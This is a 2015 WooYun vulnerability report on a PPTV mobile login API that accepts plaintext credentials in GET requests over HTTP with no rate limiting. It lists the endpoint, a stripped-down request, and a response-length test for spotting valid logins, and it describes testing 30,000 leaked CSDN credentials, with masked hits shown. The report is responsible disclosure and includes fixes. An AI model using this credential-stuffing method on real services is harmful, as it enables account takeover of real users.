当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109931

漏洞标题:撞库之pptv接口缺陷

相关厂商:PPTV(PPlive)

漏洞作者: 小手冰凉

提交时间:2015-04-24 10:31

修复时间:2015-06-11 11:10

公开时间:2015-06-11 11:10

漏洞类型:网络设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-24: 细节已通知厂商并且等待厂商处理中
2015-04-27: 厂商已经确认,细节仅向厂商公开
2015-05-07: 细节向核心白帽子及相关领域专家公开
2015-05-17: 细节向普通白帽子公开
2015-05-27: 细节向实习白帽子公开
2015-06-11: 细节向公众公开

简要描述:

撞库之pptv接口缺陷
我保证不认识如下个人,而且我也不缺看片的移动硬盘,但是你们如果真想意思意思,那我唯有恭敬不如从命了。
http://www.wooyun.org/bugs/wooyun-2010-095683
http://www.wooyun.org/bugs/wooyun-2010-092044
http://www.wooyun.org/bugs/wooyun-2010-092287
http://www.wooyun.org/bugs/wooyun-2010-092662
http://www.wooyun.org/bugs/wooyun-2010-092753
我是先发现漏洞又搜到这些记录的。

详细说明:

抓取最新版pptv手机客户端登陆数据包如下

ET /v3/login/ex_login.do?uid=35236905141543&username=1111111&appplt=aph&appid=com.pplive.androidphone&from=aph&format=json&password=111111111&appver=5.0.6&version=5.0.6 HTTP/1.1
Host: api.passport.pptv.com
Connection: Keep-Alive


精简数据包结果如下

GET /v3/login/ex_login.do?uid=35236905141543&username=<用户名或者邮箱>&format=json&password=<明文密码> HTTP/1.1
Host: api.passport.pptv.com
Connection: Keep-Alive


我简直不敢相信我的眼睛!!!再精简

http://api.passport.pptv.com/v3/login/ex_login.do?uid=35236905141543&<用户名或者邮箱>&format=json&password=<明文密码>


竟然直接在浏览器里访问这个网址就可以!!!!
但是返回值是加密的,看不出什么意思
密码错误时如下(类似)

dyQuoT3iUsJfrfCY+sbF3cbvuoU+1c2Wd1MhBzGsdqrXRFqkrsoXmp49SdjVFoW0dTHKFeyqTzCJ6LgOl+XxiTNclB2wn2BtJeaCjqpMDNnKAO7EHMomCqXBkdVWna94ojkHeMK1/HJs8n8uzJJN+aGlnaP57k7J800BppyvLQ08o1nSAAMf0AmF5Y1SVHpLk69RVkuqmNvltsKd7bpx3a38+CS5A4ZK4WUxPIzEXh8=


密码正确时如下(类似)

dyQuoT3iUsKskCJ3IL0HqSv9/eHCDW+yhkfw4JDHJoY1cUz7bkXmUhwP5sZ/UfnqNVdx1F6tgiz3GIl4GS1M3XUs9yUmCsXH69r0Nw4/AnVl7acRWsYS+/Oj8kylkAP4jmHZMSealuqHytY+aImL2U4xEkET07rx7b4IdHOfVCeVnrZYtgmPbyGBOv5EdMuVQSxgePy3oyDo+r9KSKeX4z2/bE85ClB0C0bY4WxV+pnlg1g+Cy1DNtDymws0Wk7guhfaQLLSOzry4UzavmqXySG3s3/zUr4MDhBbYP4M+q635Ye62YLZpDebkH3zcYBuYCzFIB1D3Jtx7x17qb2KkE8DkUjxzCw6Yh6jGmfFPidkFIYGJiLmMlVl+Vqrc7uBCJJmSHY4TnBaQlVP47SI7LMEPdV83RxNUYcl6IYuZb9lEd23utSfCX5u/GflqcMfeUXLzaQvs/MolmdFZ6TS1ZMl54S1UwP9TcgiT3W/ypA62cl+tEWkb+JPWRuZ7/VE1y7JaZ1SLVukH/qyokIvZF8GBzyXJA53nDooZKhmOjyz6odY1X2b+mS7MbF0XL5VwyLJF+Psk7Bfrxny688vPAOsi/GubJbU0pP8exWnzWL6eRwjvm1V0cr5lrzE342CM6/2jH3PAVr+Dx69RY+8QdbYGhMA1Ryil07A7Who1KWbCYRqq03rdxR2Cbv/w6VwMSg473llQoFEavhcAn0WtGtbkCqj3AKKyFfH9RL6eEo7D8jpCEzCDQB6lZnhIObOKQWLLCJi4jByJe9cY49csztEEC09yyVXs7J1ze0YmlkrXtND40TsAg/cwh1cnY2jCf9nlEmolgCjMrAne25Us0rt97joKzzItFHVRjDcMKyFk+NSsttzyvixDCjT+3DlDlTKqudQZ5m+MNlM8afmI5Laiy/NtzmyRpJTzkg2+UViGVSyxrQJgy3bhbg+yVXHxD6KcfUHPwMdweudqYZKvvPtasiT2TbRmpfCmPF7oKnEoFoGBRCWVVXlbb19gNHEzunZB+0pU1ADm8Tclcqc+Cq1NSv/8VCy5QnUVpm+cRXG+s9ZlDKQTZ8hkoWCit6uYewnjjT6niQbpWyo8zyK8htlBRfFOq18QTqtVNVDQ5nj2CJg6AUdi28e8g7BKp/W


这里面没有明显的特征字符串,那就直接以返回值的长度做特征,大于500就算密码正确。

漏洞证明:

仍然用csdn库测试
测试了3W条 发现一千多条
随机测试发现都可登录。
打码如下

mask 区域
*****com:hub*****
**********
*****3.com:*****
**********
*****com:yan*****
**********
*****o.com.cn*****
**********
*****.com:lz*****
**********
*****6.com:b*****
**********
*****COM:120*****
**********
*****3.com:7*****
**********
*****q.com:*****
**********
*****com:150*****
**********
*****.com:00*****
**********
*****26.com:x*****
**********
*****.com:13*****
**********
*****oo.com.c*****
**********
*****3.com:*****
**********
*****com:pwl*****
**********
*****o.cn:q88*****
**********
*****ina.com*****
**********
*****com:394*****
**********
*****3.com:s*****
**********
*****oo.cn:qaz*****
**********
*****.com:as*****
**********
*****3.com:4*****
**********
*****hoo.cn:*****
**********
*****h.net:*****
**********
*****.com:1*****
**********
*****ail.com*****
**********
*****com:liu*****

修复方案:

强制使用HTTPS
限制请求次数
验证码

版权声明:转载请注明来源 小手冰凉@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-04-27 11:08

厂商回复:

感谢反馈,处理中。

最新状态:

暂无